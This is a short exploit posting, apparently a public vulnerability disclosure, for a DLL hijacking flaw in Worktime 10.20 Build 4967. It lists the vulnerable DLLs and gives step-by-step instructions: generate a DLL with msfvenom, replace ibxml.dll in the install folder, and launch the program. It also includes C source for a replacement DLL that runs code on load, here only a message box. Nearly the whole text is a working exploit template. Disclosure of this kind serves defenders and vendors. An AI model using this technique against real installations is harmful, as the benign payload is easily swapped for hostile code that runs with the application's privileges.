Worktime version 10.20 Build 4967 suffers from a dll hijacking vulnerability.
1b4f869012ea77e97e2c873843b08c74
/*
Description:
A vulnerability exists in windows that allows other applications dynamic link libraries
to execute malicious code without the users consent, in the privelage context of the targeted application.
Exploit Title: Worktime 10.20 Build 4967 DLL Hijacking Exploit
Date: 15/01/2022
Author: Yehia Elghaly
Vendor: https://www.worktime.com/
Software: https://www.worktime.com/download/worktime_corporate.exe
Version: Latest Worktime 10.20 Build 4967
Tested on: Windows 7 Pro x86 - Windows 10 x64
Vulnerable extensions: .htm .html
Vulnerable DLL: (ibxml.dll - WINSTA.dll)
*/
Instructions:
1. Create dll using msfvenom (sudo msfvenom --platform windows -p windows/messagebox TEXT="Work Time Hacked - YME" -f dll > ibxml.dll) or compile the code
2. Replace ibxml.dll in Worktime directory C:\Program Files\WorkTimeAdministrator or C:\WorkTime with your newly dll
3. Launch WorkTimeServer.exe or WorkTimeAdministrator.exe
4. PoP UP MessageBox!
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "WorkTime Hacked!", "YME", MB_OK);
}